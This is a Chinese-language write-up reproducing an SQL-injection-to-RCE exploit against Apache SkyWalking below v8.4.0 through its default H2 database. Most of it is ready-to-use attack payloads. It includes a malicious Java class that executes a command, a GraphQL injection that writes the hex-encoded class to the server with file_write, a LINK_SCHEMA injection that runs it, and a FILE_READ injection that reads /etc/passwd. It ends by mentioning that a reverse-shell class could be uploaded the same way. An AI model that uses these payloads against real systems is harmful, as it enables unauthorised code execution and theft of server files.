0x01.漏洞成因
Skywalking 历史上存在两次SQL注入漏洞,CVE-2020-9483、CVE-2020-13921。此次漏洞(Skywalking小于v8.4.0)是由于之前两次SQL注入漏洞修复并不完善,仍存在一处SQL注入漏洞。结合 h2 数据库(默认的数据库),可以导致 RCE 。
0x02.漏洞复现
本次漏洞复现过程是:
恶意java代码(如exec(cmd)。String cmd="命令")->包装成class->H2数据库file_read()将class文件转16进制->POSTclass文件到服务器->POST读取文件指令达到回显RCE的效果。
恶意类static块
static {
try {
String cmd = "whoami";
InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
InputStreamReader i = new InputStreamReader(in,"GBK");
BufferedReader re = new BufferedReader(i);
StringBuilder sb = new StringBuilder(1024);
String line = null;
while((line = re.readLine()) != null) {
sb.append(line);
}
BufferedWriter out = new BufferedWriter(new FileWriter("output.txt"));
out.write(String.valueOf(sb));
out.close();
} catch (IOException var7) {
}
}
H2fire_read()
上传Class类
{
"query": "query queryLogs($condition: LogQueryCondition) {
logs: queryLogs(condition: $condition) {
data: logs {
serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content
}
total
}
}",
"variables": {
"condition": {
"metricName": "INFORMATION_SCHEMA.USERS union all select file_write('cafebabe00000032002a0a000a00160a0017001807001908001a08001b0a0017001c0a001d001e07001f0700200700210100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100046d61696e010016285b4c6a6176612f6c616e672f537472696e673b29560100083c636c696e69743e01000d537461636b4d61705461626c6507001f01000a536f7572636546696c6501000e546f75636846696c652e6a6176610c000b000c0700220c002300240100106a6176612f6c616e672f537472696e67010005746f75636801000f2f746d702f737563636573733132330c002500260700270c002800290100136a6176612f6c616e672f457863657074696f6e010009546f75636846696c650100106a6176612f6c616e672f4f626a6563740100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010028285b4c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294900210009000a0000000000030001000b000c0001000d0000001d00010001000000052ab70001b100000001000e000000060001000000050009000f00100001000d000000190000000100000001b100000001000e0000000600010000001200080011000c0001000d000000680004000300000023b800024b05bd0003590312045359041205534c2a2bb600064d2cb6000757a700044bb100010000001e002100080002000e0000001e000700000008000400090013000a0019000b001e000e0021000c0022000f0012000000070002610700130000010014000000020015','TouchFile.class'))a where 1=? or 1=? or 1=? --",
"endpointId":"1",
"traceId":"1",
"state":"ALL",
"stateCode":"1",
"paging":{
"pageNum": 1,
"pageSize": 1,
"needTotal": true
}
}
}
}
回显RCE(LINK_SCHEMA第二个参数为之前上传到服务器的文件名)
{
"query": "query queryLogs($condition: LogQueryCondition) {
logs: queryLogs(condition: $condition) {
data: logs {
serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content
}
total
}
}",
"variables": {
"condition": {
"metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','TouchFile','jdbc:h2:./test2','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --",
"endpointId":"1",
"traceId":"1",
"state":"ALL",
"stateCode":"1",
"paging":{
"pageNum": 1,
"pageSize": 1,
"needTotal": true
}
}
}
}
读文件
{"query":"query queryLogs($condition: LogQueryCondition) {\n queryLogs(condition: $condition) {\n logs{\n content }\n }}","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--","paging":{"pageNum":1,"pageSize":1},"state":ALL, "queryDuration":{"start":"2021-02-07 1554","end":"2021-02-07 1554","step":"MINUTE"}}}}
0x03.
写入的.class文件在执行一次后即销毁,必须将需要执行的命令写入class,通过'select LINK_SCHEMA'执行。因此应该不能直接写入shell,但可以上传class实现反射shell。没学过java不知如何写这个class,有机会再尝试